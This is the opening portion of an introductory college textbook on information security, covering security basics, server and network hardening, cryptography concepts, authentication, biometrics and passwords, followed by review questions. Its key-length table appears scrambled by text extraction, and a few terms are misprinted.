Internet Security E-Book

INFORMATION
SECURITY
S. C. Punitha, M.Sc., M.Phil., MFT.,

G. Sophia Reena, MCA., M.Phil.,
K. Geethalakshmi, MCA., M.Phil., B.Ed.,
PSGR KRISHNAMMAL COLLEGE FOR WOMEN

(College with Potential for Excellence)
(Re - Accredited, Autonomous and Affiliated to Bharathiar University)
(An ISO 9001:2008 Certified Institution)
Peelamedu, Coimbatore - 641 004 Web Site : www.psgrkc.com
Email : [email protected]
All Rights Reserved
No part of this book shall be reproduced in any form without the

prior permission of the authors.
FIRST EDITION : 2014
Price : Rs. 100
Printed by:
M/S. KALAIKATHIR ACHCHAGAM
Kalaikathir Buildings, 963, Avanashi Road,
Coimbatore - 641 037 p Tamilnadu p India
Phones : 0422 - 2223454 p 2221011 p 2220085
Fax : 0422 - 2223187
Mobiles : 098422 21172 p 098422 64640
Dedicated to
Smt. G. Chandrakanthi
&
Sri. G. R. Govindarajulu
Information Security
CONTENTS
S. No. CONTENTS PAGE NO
1 UNIT I - INFORMATION SECURITY BASICS ( 1 -16)
1.1 Definition of Information Security
1.2 History of Information Security
1.3 What is Security?
1.4 Characteristics of Information Security
1.5 Components of Information System
1.6 Security System Development Life Cycle (SecSDLC)
1.7 Information Security for Technical
Administrators: Server Security - Network
Security
1.8 Questions
2 UNIT II - CRYPTOGRAPHY (17-38)
2.1 Cryptography - Basic Concepts
2.2 Plaintext
2.3 Cipher Text
2.4 Encryption Principles
2.5 CRYPT Analysis
2.6 Cryptograph Algorithm
2.7 Cryptographic Tools
2.8 Authentication
2.9 Biometrics
2.10 Passwords
2.11 Questions
3 UNIT III - FIREWALLS, VIRUSES & WORMS
& DIGITAL RIGHTS MANAGEMENT (39 -56)
3.1 Viruses and Worms
3.2 Worms
3.3 Digital Rights Management
3.4 Firewalls
3.5 Application and Circuit Proxies
3.6 Stateful Inspection
3.7 Design Principles of Firewall
3.8 Questions
4 UNIT IV - HACKING (57-94)
4.1 Hacking - Introduction
4.2 Hacker Hierarchy
4.3 Password Cracking- Definition
4.4 Phishing
4.5 Network Hacking
4.6 Wireless Hacking
4.7 Window Hacking
4.8 Web Hacking
4.9 Ethical Hacking
4.10 Questions
5 UNIT V - CYBER LAW, CASE STUDIES:
DNS, IP SEC & SOCIAL MEDIA (95-118)
5.1 What is Cyber law?
5.2 Need for Cyber law
5.3 Advantages of Cyber laws
5.4 Domain Name System (DNS)
5.5 IP Security
5.6 IP Addressing and Routing
5.7 Social Media
5.8 Questions
Preface
Information Security was primarily confined to the military
cryptographers in the earlier years. With the advancement in
Information and Communication systems, basic understanding &
usage of information security has become imperative. This is precisely
the reason for introducing the subject at the UG and PG level as per the
recommendations of the University Grants Commission and Bharathiar
University.
The main focus of this book is on the basics of information
security provided in 15 units as per the syllabus requirement. To make
the book more user friendly, case studies are also included. This book
intended to serve merely as a handbook for starters. Hence no attempt
has been made to provide a bibliography, the source for the book being
the standard text books and Internet. Written in a simple style it brings
out the facts in a brief manner. Certain illustration and brief legislations
regarding information security have also been included in appropriate
place. Each unit ends with additional exercise in the form of questions.
If the contents stir the curiosity of young seekers, the purpose of this
book is fulfilled.
The driving force behind the course development is Dr.N.
Yesodha Devi, Principal and we acknowledge her initiative to get us to
complete this work. We are thankful to our management for their
approval. Numerous people assisted us in the preparation of the book
in one form or other. We thank our students for helping us in preparing
manuscript with all the illustrations used in the text. We thank Dr.B.
Murali, Head, Department of Computer Science, P.S.G College of Arts
& Science, Coimbatore and Dr. M.S. Vijaya, HoD, Department of
Computer Application, GRGSACT, Coimbatore for reviewing the book
and providing useful suggestions.
We are immensely thankful to Dr.R.Nadarajan Prof. and Head,
Department of Applied Mathematics and Computational Sciences, PSG
College of Technology, Coimbatore for providing the foreword which
has added value to our publication. We thank all the Deans and the
faculty members of the Computer Science Department for their
tremendous assistance in our pioneering endeavor. Last but not the
least we owe thanks to our publishers for their elegant work.
S. C. Punitha
G. Sophia Reena
K. Geethalakshmi
UNIT I
Information Security Basics
1.1 DEFINITION OF INFORMATION SECURITY
Information security in today's enterprise is a "well-informed sense of
assurance that the information risks and controls are in balance."
Information security: The protection of information and information
systems from unauthorized access, use, disclosure, disruption,
modification, or destruction in order to provide confidentiality,
integrity, and availability.
1.2 HISTORY OF INFORMATION SECURITY
Ÿ Computer security began immediately after the first mainframes
were developed
Ÿ The first modern computer was developed by code breaking
computation groups during World War II "Physical controls were
needed to limit access to authorized personnel to sensitive military
locations
Ÿ Only rudimentary controls were available to defend against physical
theft, espionage, and sabotage
Ÿ In 1960's Department of Defense's Advanced Research Project
Agency (ARPA) began examining the feasibility of a redundant
networked communications. Larry Roberts developed the project
from its inception
Ÿ In 1970's ARPANET grew in popularity as did its potential for
misuse. Fundamental problems with ARPANET security were
identified
s No safety procedures for dial-up connections to the ARPANET
s User identification and authorization to the system were non-

existent
Ÿ In the late 1970s the microprocessor expanded computing
capabilities and security threats
Ÿ The scope of computer security grew from physical security to
include:
3
s Safety of the data, limiting unauthorized access to that data,
involvement of personnel from multiple levels of the
organization
Ÿ In 1990's, the Internet brought connectivity to virtually all computers
that could reach a phone line or an Internet connected Local Area
Network (LAN).
Ÿ Today, the Internet brings millions of unsecured computer networks
into continuous communication with each other.
1.3 WHAT IS SECURITY?
Ÿ "The quality or state of being secure--to be free from danger"
Ÿ A successful organization should have multiple layers of security in

place:
- Physical security: to protect physical items, objects or areas from
unauthorized access and misuse.
- Personal security: to protect the individual or group of
individuals who are authorized to access the organization and its
operations.
- Operations security: to protect the details of a particular operation
or series of activities.
- Communications security: to protect communication media,
technology and content.
- Network security: to protect networking components,
connections and content.
- Information security: to protect information assets.
1.4 CHARACTERISTICS OF INFORMATION SECURITY
The value of information comes from the characteristics it possesses.
- Availability
- Accuracy
4
- Authenticity
- Confidentiality
- Integrity
- Utility
- Possession
Fig 1.1 Block Diagram of Information Security

1.4.1 Availability: For any information system to serve its purpose, the
information must be available when it is needed. This means that the
computing systems used to store and process the information, the
security controls used to protect it, and the communication channels
used to access it must be functioning correctly. High availability
systems aim to remain available at all times, preventing service
disruptions due to power outages, hardware failures, and system
upgrades. Ensuring availability also involves preventing denial-of-
service attacks, such as a flood of incoming messages to the target
system essentially forcing it to shut down.
1.4.2 Accuracy: Information has accuracy when it is free from mistakes
or errors and it has the value that the end user expects. If information
has been intentionally or unintentionally modified, it is no longer
accurate.
1.4.3 Authenticity: In computing e-Business, and information security,
5
it is necessary to ensure that the data, transactions, communications or
documents (electronic or physical) are genuine. It is also important for
authenticity to validate that both parties involved are who they claim to
be. Some information security systems incorporate authentication
features such as "digital signatures", which give evidence that the
message data is genuine and was sent by someone possessing the
proper signing key.
1.4.4 Confidentiality: Confidentiality refers to preventing the
disclosure of information to unauthorized individuals or systems. For
example, a credit card transaction on the Internet requires the credit
card number to be transmitted from the buyer to the merchant and from
the merchant to a transaction processing network. The system attempts
to enforce confidentiality by encrypting the card number during
transmission, by limiting the places where it might appear (in
databases, log files, backups, printed receipts, and so on), and by
restricting access to the places where it is stored. If an unauthorized
party obtains the card number in any way, a breach of confidentiality
has occurred. Confidentiality is necessary for maintaining the privacy
of the people whose personal information is held in the system.
1.4.5 Integrity: In information security, data integrity means
maintaining and assuring the accuracy and consistency of data over its
entire life-cycle. This means that data cannot be modified in an
unauthorized or undetected manner. Integrity is violated when a
message is actively modified in transit. Information security systems
typically provide message integrity in addition to data confidentiality.
1.4.6 Utility: The utility of information is the quality or state of having
value for some purpose. Information has value when it can serve a
particular purpose. This means that, if information is available but not
in a format meaningful to the end user.
1.4.7 Possession: The possession of information is a quality or state of
ownership or control of some object or item. Information is said to be
one's possession if one obtains it, independent of format or other
characteristics.
6
1.5 COMPONENTS OF INFORMATION SYSTEM
The 5 components that must come together in order to produce a
Computer-Based Information system are:
1. Hardware: The term hardware refers to machinery. This category
includes the computer itself, which is often referred to as the central
processing unit (CPU), and all of its support equipments. Among the
support equipments are input and output devices, storage devices and
communications devices.
2. Software: The term software refers to computer programs and the
manuals (if any) that support them. Computer programs are machine-
readable instructions that direct the circuitry within the hardware parts
of the system to function in ways that produce useful information from
data. Programs are generally stored on some input / output medium,
often a disk or tape.
3. Data: Data are facts that are used by programs to produce useful
information. Like programs, data are generally stored in machine-
readable form on disk or tape until the computer needs them.
4. Procedures: Procedures are the policies that govern the operation
of a computer system. "Procedures are to people what software is to
hardware" is a common analogy that is used to illustrate the role of
procedures in a system.
5. People: Every system needs people if it is to be useful. Often the
most over-looked element of the system is the people, probably the
component that most influence the success or failure of information
systems.
1.6 SECURITY SYSTEM DEVELOPMENT LIFE CYCLE (SecSDLC)
The Security System Development Life Cycle (SecSDLC) is same
as System Development Life Cycle (SDLC), but they do differ in the
specific activities performed in each phase. Both the SecSDLC and the
SDLC consist of the following phases:
7
1. Investigation
2. Analysis
3. Logical Design
4. Physical Design
5. Implementation
6. Maintenance
The SecSDLC process involves the identification of specific
threats and the risk that they represent as well as the needed
implementation of security controls to counter mitigate and manage the
risk. Whereas, in the SDLC process, the focus is on the design and
implementation of an information system in an organization for use in
information technology (IT).
Investigation
Analysis
Logical design
Physical design
Implementation
Repeat Maintenance
and change
SDLC Water Methodology
Fig 1.2. SDLC Waterfall Method

1.6.1 Investigation - The investigation phase of the SecSDLC begins
with a directive from upper management specifying the process,
outcomes, and goals of the project, as well as its budget and other
constraints.
1.6.2 Analysis - A preliminary analysis of existing security policies or
programs, along with documented current threats and associated
controls are conducted.
8
1.6.3 Logical Design - In the logical design phase, team members
create and develop the blueprint for security, and examine as well as
implement key policies that influence later decisions.
1.6.4 Physical Design - In the physical design phase, team members
evaluate the technology to support the security blueprint, generate
alternative solutions, and agree upon a final design.
1.6.5 Implementation - The security solutions are acquired tested and
implemented Personnel issues are evaluated and specific training &,
education programs are conducted.
1.6.6 Maintenance - Once the information security program has been
implemented, it must be operated, properly managed and kept up to
date by means of established procedures.
1.7 INFORMATION SECURITY FOR TECHNICAL
ADMINISTRATORS: SERVER SECURITY- NETWORK SECURITY
1.7.1 Server Security
Definitions
Service: The work performed on behalf of a user or client program.
Usually, services are implemented by some set of software known as a
“server." "Client" programs then connect to the "server" and request that
work is done on their behalf. The language that the "client" and "server"
use to communicate is a "protocol."
Server: The software that performs a "service." This software is often
referred technically to as a "daemon" or "service".
Client: The software that uses the "service" provided by a “server."
Server Security
For any operating system, it is important to follow the general
guidelines listed below:
Review the purpose Conceptualize the role of each computer within an
organization and which services each computer will offer. The services
that it provides should entirely be dictated by its role within an
9
organization and by the type of information (i.e., public vs. "not public")
that flows through it. Create departmental policies to address the
acceptable use and security of all computers.
Set up authentication & account management before
connecting to the network
Ÿ All accounts should have strong passwords.
Ÿ Administrative or root accounts should have even stronger

passwords or passphrases.
Ÿ Use the administrator or root account when absolutely necessary.
Ÿ Assign a unique administrative account and password to each

individual to better distinguish activities between multiple
administrators.
Ÿ Use different passwords for administrator or root and general
user accounts.
Ÿ Force new users to change their passwords when they first login.
Ÿ Regularly review the access list or log for users, especially of root
and groups. Look for unexpected rights or changes.
Ÿ Limit the use of the same password across dissimilar systems (use
of the same password on a less secure system may endanger a
more secure system).
Ÿ Disable or delete old or unused accounts that belong to people
who no longer need access.
Ÿ Be sure to have a plan and process for securing administrator and
root passwords that allows appropriate access to the server in
case of illness, turnover, or unforeseen circumstances.
Ÿ See the Authentication section in the Securing Private Data,
Computers and other Electronic Devices Policy
Ÿ Tips on passwords and passphrases
Ÿ For Windows operating systems, avoid adding service accounts

10
to the default Administrators Group and instead assign rights
specific to the tasks the accounts requires.
Install and patch the operating system before connecting to the
network
Ÿ The operating system and other software should be vendor
supported for security patches.
Ÿ When installing software, make sure to only install latest versions
of recommended software and security patches that are available.
Ÿ Download patches to another computer and put on CD.
Ÿ After installation, all computers should be routinely maintained

and updated. This includes the installation of operating system
patches and new versions of installed software. See the Security
Patches section in the Securing Private Data, Computers and
other Electronic Devices Policy.
Ÿ For UNIX-like operating systems, when installing third party
software, consider using the ports or package trees available with
each operating system. This ensures that the software is compiled
with all available patches on the computer that it will be installed
upon.
Run minimum number of services
Ÿ Each computer should only provide services needed for its role in
an organization.
Ÿ Make sure to configure all installed software, disable all unused
features and be sure to limit the availability of any features that
are enabled.
Ÿ Use SSH (secure shell) instead of FTP (File Transfer Protocol) and
Telnet protocol.
Ÿ Unless using network management tools, turn off Simple
Network Management Protocol (SNMP). If SNMP is enabled,
change the default community name and set permissions. Be sure
11
to delete the public community string, if software allows you to
do this or at least change the default settings.
Ÿ In UNIX operating systems, turn off unnecessary and trivial
intend services.
Install filters or firewall
Ÿ Install and configure a packet filtering utility such as TCP
wrappers or a software or hardware firewall to protect individual
services.
Ÿ The rules should reflect the acceptable use and security policies
that have been defined for the computer.
Ÿ Operating system filters that deny or permit certain traffic should
be used if available.
Ÿ Periodically review the filters for inappropriate or unneeded
access.
Ÿ For UNIX-like operating systems, install and configure a packet
filtering utility such as TCP wrappers, IP chains, IP tables or a
software or hardware firewall to limit access to the computer. The
rules should reflect the acceptable use and security policies that
have been defined for the computer.
Ÿ For Windows, the Microsoft IP Filtering is an option similar to
TCP wrappers for UNIX operating systems.
Set up and review logs
Ÿ Configure all services so that they log all connections and
authentication information. Forward all of these logs to a highly
secure computer if possible.
Ÿ Someone should be assigned the responsibility to review and as
appropriate follow up on possible security violations identified
in the system logs. For important servers this might be as often as
daily.
12
Install security-related software
Ÿ Install security related software on each computer, as appropriate
to the level of security needed.
Ÿ Install anti-virus or other virus filtering software with daily
updating for the latest virus definitions. SSH or other encrypted
and secure method of access should be installed if remote access
or remote administration services are needed. SSH improves the
security of user accounts by encrypting all login sessions and
allowing the forwarding of X11 and other arbitrary network
traffic. Many SSH distributions are free for educational use. Also
take additional steps to help reduce the risk of SSH password
guessing compromises by using strong passwords, not allowing
root to log in through SSH, and using host based or network
firewalls to limit access to specific IP addresses. Also, it is
particularly important to apply these recommendations to
computers running Apple OS/X where administrator accounts
are root equivalent.
Ÿ Install virtual private network (VPN) encrypted tunnel if unable
to install SSH or when clear text is a security risk. Maintain
physical security
Ÿ Locate the server in a secure location with proper documentation..
Ÿ Use Uninterruptible Power Supply (UPS) for servers and other
essential peripheral equipment (e.g., monitors, KVM switches,
etc.).
Ÿ Locate servers in a climate-controlled environment (e.g.,
dedicated air conditioning within room temperature controls).
Ÿ Consider basic fire suppression services/options (e.g.,
extinguishers, sprinklers, etc.).
Ÿ Utilize "keyboard locking" software or password protected screen
savers to prevent keyboard activity.
Ÿ See the Physical Security section in the Securing Private Data,
13
Computers and Other Electronic Devices Policy.
Maintain backups and operational continuity
Ÿ Run back-ups regularly and periodically store off-site.
Ÿ Test the restore capability periodically.
Ÿ Use a secure deletion program to erase data from hard disks and
media after done using and prior to transfer or disposal of
hardware. See the Secure Data Deletion section in the Securing
Private Data, Computers and Other Electronic Devices Policy and
the University Security Framework Media Sanitization standard.
Identify the computer for security event notification
Ÿ Maintain the information about the computer in Service
Gateway.
Ÿ Identify critical servers to University Information Security. See
the Critical Server Identification section in the Securing Private
Data, Computers and Other Electronic Devices Policy.
1.7.2 Network Security
Definition:
Network security refers to any activities designed to protect your
network. Specifically, these activities protect the usability, reliability,
integrity, and safety of your network and data. Effective network
security targets a variety of threats and stops them from entering or
spreading on your network.
Network Security Threats:
Many network security threats today are spread over the Internet. The
most common include:
Ÿ Viruses, worms, and Trojan horses
Ÿ Spyware and adware
Ÿ Zero-day attacks, also called zero-hour attacks
14
Ÿ Hacker attacks
Ÿ Denial of service attacks
Ÿ Data interception and theft
Ÿ Identity theft
Network Security Components:

Network security is accomplished through hardware and
software. The software must be constantly updated and managed to
protect from emerging threats.
A Network security system usually consists of many components.
Ideally, all components work together, which minimizes maintenance
and improves security.
Network security components often include:
Ÿ Anti-virus and anti-spyware
Ÿ Firewall, to block unauthorized access to your network
Ÿ Intrusion prevention systems (IPS), to identify fast-spreading

threats, such as zero-day or zero-hour attacks
Ÿ Virtual Private Networks (VPNs), to provide secure remote
access
What are the Business Benefits of Network Security?
With network security in place, the company will experience
many business benefits. It is protected against business disruption,
which helps employees productive. Network security helps the
company meet mandatory regulatory compliance. Because network
security helps protect the customers' data, it reduces the risk of legal
action from data theft.
15
1.8 QUESTIONS
Give Short Answers
1. Which system is used to secure the information?
2. List the scope of computer security.
3. Can the information be available at any time? Justify.
4. How will you protect the data using digital signatures?
5. Which system is used to secure the networking components?
6. How will you maintain the accuracy and consistency of the
information?
7. List the phases of the security system development lifecycle.
8. What is server security?
9. How will you patch the operating system before connecting to
the network?
10. Why do we needed to run minimum number of services in our
computers?
11. What is firewall? What are the steps involved to install the filters?
12. Name any two security related software.
13. List any four maintenance of physical security.
14. What is the purpose of backups?
15. Why do we need to run a network based vulnerability scan?
16. Name any four network security threats.
17. How network security is used in business?
18. List any four network security components.
Answer Briefly in One Paragraph
1. Elucidate the history of information security.
2. Pen down the characteristics of information security.
3. Enumerate the phases of security system development life cycle.
4. What are the components needed to produce a computer-based
information system?
5. What are the steps needed to set up authentication and account
management before connecting to the network?
16
UNIT II
Cryptography
2.1 CRYPTOGRAPHY - BASIC CONCEPTS
It is the art or science encompassing the principles and methods of
transforming an intelligible message into one that is unintelligible and
then retransforming that message back to its original form:
Ÿ Plaintext - the original intelligible message
Ÿ Cipher text - the transformed message
Ÿ Cipher - an algorithm for transforming an intelligible message

into one that is unintelligible by transposition and/or
substitution methods
Ÿ Key - some critical information used by the cipher, known only to
the sender & receiver
Ÿ Encipher(encode) - the process of converting plaintext to cipher
text using a cipher and a key
Ÿ Decipher(decode) - the process of converting cipher text back
into plaintext using a cipher and a key
Ÿ Cryptanalysis - the study of principles and methods of
transforming an unintelligible message back into an intelligible
message without knowledge of the key, also called code breaking
2.2 PLAINTEXT
Plaintext is the term used to refer to the information in plain
language that the sender desires to send to one or more receiving
computers or individuals. Plaintext is given as the input to a cipher or
encryption algorithm.
The term clear text can also refer to sounds, images, or other
multimedia information that is transmitted without encryption. In
laymen's terms, plaintext refers to information that is represented in its
"normal" form before any action is taken to conceal or compress the
data.
19
2.3 CIPHER TEXT
Cipher text is encrypted text. Plaintext is what user has before
encryption, and cipher text is the encrypted result. The term cipher is
sometimes used as a synonym for cipher text, but it more properly
means the method of encryption rather than the result.
2.4 ENCRYPTION PRINCIPLES
Ÿ One can only send one's communication partners encrypted
messages and files when one is in possession of their public key.
Ÿ For encryption, the sender uses the public key of his/her
communication partner to encode the plain text. Only the
intended recipient can decrypt the encoded text again with
his/her respective private key, inputting a mantra (password
phrase) known only to him/her.
2.5 CRYPT ANALYSIS
Cryptanalysis refers to the study of ciphers, cipher text, or
cryptosystems (that is, to secret code systems) with a view to finding
weaknesses in them that will permit retrieval of the plaintext from the
cipher text, without necessarily knowing the key or the algorithm. This
is known as breaking the cipher, cipher text, or cryptosystem.
Breaking is sometimes used interchangeably with weakening.
This refers to finding a property (fault) in the design or implementation
of the cipher that reduces the number of keys required in a brute force
attack (that is, simply trying every possible key until the correct one is
found). For example, assume that a symmetric cipher implementation
uses a key length of 2^128 bits (2 to the power of 128): this means that a
brute force attack would need to try up to all 2^128 possible
combinations (rounds) to be certain of finding the correct key (or, on
average, 2^127 possible combinations) to convert the cipher text into
plaintext, which is not possible given present and near future
computing abilities. However, a cryptanalysis of the cipher reveals a
technique that would allow the plaintext to be found in 2^40 rounds.
While not completely broken, the cipher is now much weaker and the
plaintext can be found with moderate computing resources.
20
2.1 CRYPTOGRAPHIC ALGORITHMS
Algorithm Name Key Management Issue

Encryption Algorithms Ÿ The modes of operation are
ES (128, 192, 256 bits) NIST standard specified in NIST Special
FIPS PUB 197 2001 (Advanced Publicatio n 800-38A and 800-38C.
Encryption Standard) gives a Ÿ The crypto period shall not exceed
specification for the AES algorithm. seven days.
Ÿ The 3-key option provides the best
security and is therefore the
preferred option. The 2-key option
is also currently acceptable for
Protected A and B, where the key
u s e d i n t h e f i n a l
encryption/decryption operation
is the same as in the first
encryption/decryption operation.
Triple-DES Ÿ The single key option which is

equivalent to DES is not approved
(ANSI X9.52; Triple DES Encryption by CSEC for the protection of
Algorithm Modes of Operation and Protected GC information.
NIST Special Publication 800-67 2004
(Recommendation for the Triple Data Ÿ Use of the 2-key option for
Encryption Algorithm (TDEA) Block Protected A and B information
shall be discontinued by the end of
Cipher) specify the acceptable
2015.
methods of implementing Triple-
DES.) Ÿ The crypto period shall not exceed
seven days.
Ÿ Acceptable modes of operation are
the same as those defined for AES.
Ÿ The 128-bit version of CAST5 is
CAST5 (80 and 128 bits) currently valid for all levels of
protected information. For
Protected C information, use of the
21
80-bit version should have been
discontinued by the end of 2005.
For Protected A and B
information, use of the 80-bit
version shall be discontinued by
the end of 2013.
Ÿ For 80-bit CAST5, the crypto
period shall not exceed 24 hours.
For 128-bit CAST5, the crypto
period shall not exceed 7 days.
Key Establishment Algorithms
Ÿ The modulus shall be at least 1024

bits long for Protected A and B
information, and 2048 bits long for
Protected C information.
Ÿ By the end of 2013, the modulus
length shall be increased to at least
2048 bits for Protected A and B
information. The modulus length
RSA (Rivest, Shamir, Adleman) shall be increased to at least 3072
bits by the end of 2025 for
Protected C and by the end of 2030
for all other levels of protected
information.
Ÿ Crypto periods shall be approved
by CSEC.
Ÿ The field size shall be prime and be
at least 1024 bits long for
Other algorithms based on Protected A and B information,
exponentiation in finite fields (e.g., and 2048 bits long for Protected C
Diffie-Hellman, MQV) information.
Ÿ By the end of 2013, a field size of at
least 2048 bits for Protected A and
22
B information shall be used. By the
end of 2025 a field size of at least
3072 bits shall be used for
Protected C information. By the
end of 2030 a field size of at least
3072 bits shall be used for
Protected A and B information.
Ÿ CSEC must approve the schemes
in which the key exchange is
embedded. Crypto periods shall
be approved by CSEC.
Ÿ The ECC shall be implemented
over a finite field of order q, where
q is an odd primer or of the form
2m where m is a prime. Associated
with the domain parameters is a
key length, the length in bits of the
order of the base points. The key
length shall be at least 160 bits in
length for Protected A and B
information, and 224 bits in length
Elliptic Curve algorithms for Protected C information.
Ÿ For Protected A and B
information, elliptic curve key
lengths of at least 224 bits shall be
used by the end of 2013.
Ÿ Recommended curves can be
found in Appendix D of FIPS 186-3
(Digital Signature Standard
(DSS)).
Ÿ CSEC must approve the schemes
in which the key exchange is
embedded.
Ÿ Crypto periods shall be approved
by CSEC.
23
2.7 CRYPTOGRAPHIC TOOLS
Ÿ Extension of the Toolkit for Counting Active S-boxes using Mixed-
Integer Linear Programming (MILP)
This toolkit can be used to prove the security of cryptographic
ciphers against linear and differential cryptanalysis. The toolkit
generates a Mixed-Integer Linear Programming problem which counts
the minimum number of (linearly or differentially) active S-boxes for a
given cipher and solves this using a MILP solver in Sage. The toolkit
includes the implementation in Sage for AES, small AES, Present, Led,
mCrypton, Klein and Enocoro.
Ÿ KeccakTools
KeccakTools is a set of C++ classes aimed at helping analyze the

sponge function family Keccak. Version 3.3 is a major update, as it adds
important classes and methods related to differential and linear
cryptanalysis. These classes and methods were used to obtain the
results reported in the paper Differential propagation analysis.
A tool for information set decoding
Ÿ Information set decoding
This library, written in C++, is reasonably efficient at finding low
weight codewords of a linear code words using information set
decoding.
Ÿ S-functions toolkit
Toolkit for the differential cryptanalysis of S-functions.
Ÿ Automated algebraic cryptanalysis
A simple tool for the automatic algebraic cryptanalysis of a large
array of stream and block ciphers.
2.8 AUTHENTICATION
Ÿ The determination of identity, usually based on a combination of
Ÿ something the person has (like a smart card or a radio key fob storing
secret keys),
24
Ÿ something the person knows (like a password),
Ÿ Something the person is (like a human with a fingerprint).
2.8.1 Barcodes
Ÿ First-generation barcodes represent data as a series of variable-
width, vertical lines of ink, which is essentially a one-dimensional
encoding scheme.
Ÿ Some more recent barcodes are rendered as two-dimensional
patterns using dots, squares, or other symbols that can be read by
specialized optical scanners, which translate a specific type of
barcode into its encoded information.
2.8.2 Magnetic Stripe Cards
Ÿ Plastic card with a magnetic stripe containing personalized
information about the card holder.
Ÿ The first track of a magnetic stripe card contains the cardholder's full
name in addition to an account number, format information, and
other data.
Ÿ The second track may contain the account number, expiration date,
and information about the issuing bank, data specifying the exact
format of the track, and other discretionary data.
2.8.3 Smart Cards
Ÿ Smart cards incorporate an integrated circuit, optionally with an on-
board microprocessor, which microprocessor features reading and
writing capabilities, allowing the data on the card to be both accessed
and altered.
Ÿ Smart card technology can provide secure authentication
mechanisms that protect the information of the owner and are
extremely difficult to duplicate.
2.8.4 SIM Cards
Ÿ Many mobile phones use a special smart card called a Subscriber
Identity Module card (SIM card).
25
Ÿ A SIM card is issued by a network provider. It maintains personal
and contact information for a user and allows the user to
authenticate to the cellular network of the provider.
2.9 BIOMETRICS
"Biometrics" means "life measurement" but the term is usually
associated with the use of unique physiological characteristics to
identify an individual. The application which most people associate
with biometrics is security. However, biometric identification has
eventually a much broader relevance as computer interface becomes
more natural. Knowing the person with whom you are conversing is an
important part of human interaction and one expects computers of the
future to have the same capabilities.
A number of biometric traits have been developed and are used to
authenticate the person's identity. The idea is to use the special
characteristics of a person to identify him. By using special
characteristics such as face, iris, fingerprint, signature etc. A biometric
system can be either an 'identification' system or a 'verification'
(authentication) system.
Identification - One to Many: Biometrics can be used to determine
a person's identity even without his knowledge or consent. For
example, scanning a crowd with a camera and using face recognition
technology, one can determine matches against a known database.
Verification - One to One: Biometrics can also be used to verify a
person's identity. For example, one can grant physical access to a secure
area in a building by using finger scans or can grant access to a bank
account at an ATM by using retinal scan.
2.9.1 Biometric Authentication
Biometric authentication requires to compare a registered or
enrolled biometric sample (biometric template or identifier) against a
newly captured biometric sample (for example, the one captured
during a login). This is a three-step process (Capture, Process, Enroll)
followed by a verification or identification process.
26
During Capture process, raw biometric is captured by a sensing
device such as a fingerprint scanner or video camera. The second phase
of processing is to extract the distinguishing characteristics from the
raw biometric sample and convert into a processed biometric identifier
record (sometimes called biometric sample or biometric template). Next
phase does the process of enrollment. Here the processed sample (a
mathematical representation of the biometric - not the original
biometric sample) is stored / registered in a storage medium for future
comparison during an authentication. In many commercial
applications, there is a need to store the processed biometric sample
only. The original biometric sample cannot be reconstructed from this
identifier.
2.9.2 Iris Recognition
Biometrics is a type of physical identification that is based on the
personal and unique characteristics of the iris, the colored ring around
the pupil of an eye. Similar to the more common fingerprint recognition,
iris recognition is based on scanning a person's iris and comparing the
scan to a stored photograph or template to make an identification
match.
In Fig 2.1 indicates the Iris recognition is the process of
recognizing a person by analyzing the random pattern of the Iris. The
Iris is a muscle within the eye that regulates the size of the pupil,
controlling the amount of light that enters the eye. It is the colored
portion of the eye with coloring based on the amount of melatonin
pigment within the muscle.
Fig 2.1 Example of 10 Different People Iris
27
The technology combines computer vision, pattern recognition,
statistical inference, and optics. Its purpose is real-time, high confidence
recognition of a person's identity by mathematical analysis of the
random patterns that are visible within the iris of an eye from some
distance.
2.9.3 Voice Recognition
The term voice recognition or speaker identification refers to
finding the identity of "who" is speaking, rather than what they are
saying. Recognizing the speaker can simplify the task of translating
speech in systems that have been trained on a specific person's voice or
it can be used to authenticate or verify the identity of a speaker as part of
a security process.
Fig 2.2 Voice Recognition

2.9.4 Fingerprint Recognition
An extremely useful biometrics technology since fingerprints has
long been recognized as a primary and accurate identification method.
Ÿ Ink & paper - the oldest way
Ÿ Ink-less Methods - sense the ridges on a finger
"Live scan" fingerprint scanners

Optical methods (FTIR), CMOS capacitance, Thermal sensing,
Ultrasound sensing
28
Capture Extraction Comparison Verify
individual
No Yes
Scan left Thin Image Sample Access Access to

index to a Single minutiae denied applications
finger Pixel graph cannot sign records
sign
Acceptable records
Score
Ending
minutiae
Identity
minutiae
Bifurcation Reference
minutiae minutiae
Graph for
individual
Minutiae
graph
Fig 2.3 Fingerprint Recognition Process

2.9.5 Face Recognition
A face recognition system is expected to identify faces present in
images and videos automatically. First automatic face recognition
system was developed by Kanade 1973.
It can operate in either or both of two modes:
Ÿ Face verification (or authentication): involves a one-to-one match
that compares a query face image against a template face image
whose identity is being claimed.
Ÿ Face identification (or recognition): involves one-to-many matches
that compares a query face image against all the template images in
the database to determine the identity of the query face.
29
2.10 PASSWORDS
A password is a word or string of characters used for user
authentication to prove identity or access approval to gain access to a
resource (example: an access code is a type of password), which should
be kept secret from unauthorized users..
The use of passwords is known to be ancient. Sentries would
challenge those wishing to enter an area or approaching it to supply a
password or watchword, and would only allow a person or group to
pass if they knew the password. In modern times, user names and
passwords are commonly used by people during a log in process that
controls access to protected computer operating systems, mobile
phones, cable TV decoders, Automated Teller Machines (ATMs), etc. A
typical computer user has passwords for many purposes: logging into
accounts, retrieving e-mail, accessing applications, databases,
networks, web sites, and even reading the morning newspaper online.
2.10.1 Password-Based Cryptography
Password-based cryptography generally refers to two distinct
classes of methods:
Ÿ Single-party methods
Ÿ Multi-party methods
Single party methods

Some systems attempt to derive a cryptographic key directly from
a password. However, such practice is generally ill-advised when there
is a threat of brute-force attack. Techniques to mitigate such attack
include passphrases and iterated (deliberately slow) password-based
key derivation functions such as PBKDF2 (RFC 2898).
Multi-party methods
Password-authenticated key agreement systems allow two or
more parties that agree on a password (or password-related data) to
derive shared keys without exposing the password or keys to network
attack. Earlier generations of challenge-response authentication
30
systems have also been used with passwords, but these have generally
been subject to eavesdropping and/or brute-force attacks on the
password.
Fig 2.4 Password Authentication
A log in window for a website requesting a username and a password.
Despite the name, there is no need for passwords to be actual

words; indeed passwords which are not actual words may be harder to
guess, a desirable property. Some passwords are formed from multiple
words and may more accurately be called a passphrase. The term pass
code is sometimes used when the secret information is purely numeric,
such as the Personal Identification Number (PIN) commonly used for
ATM access. Passwords are generally short enough to be easily
memorized and typed.
Most organizations specify a password policy that sets

requirements for the composition and usage of passwords, typically
dictating minimum length, required categories (e.g. upper and lower
case, numbers, and special characters), prohibited elements (e.g. own
name, date of birth, address, telephone number). Some governments
have national authentication frameworks that define requirements for
user authentication to government services, including requirements for
passwords.
31
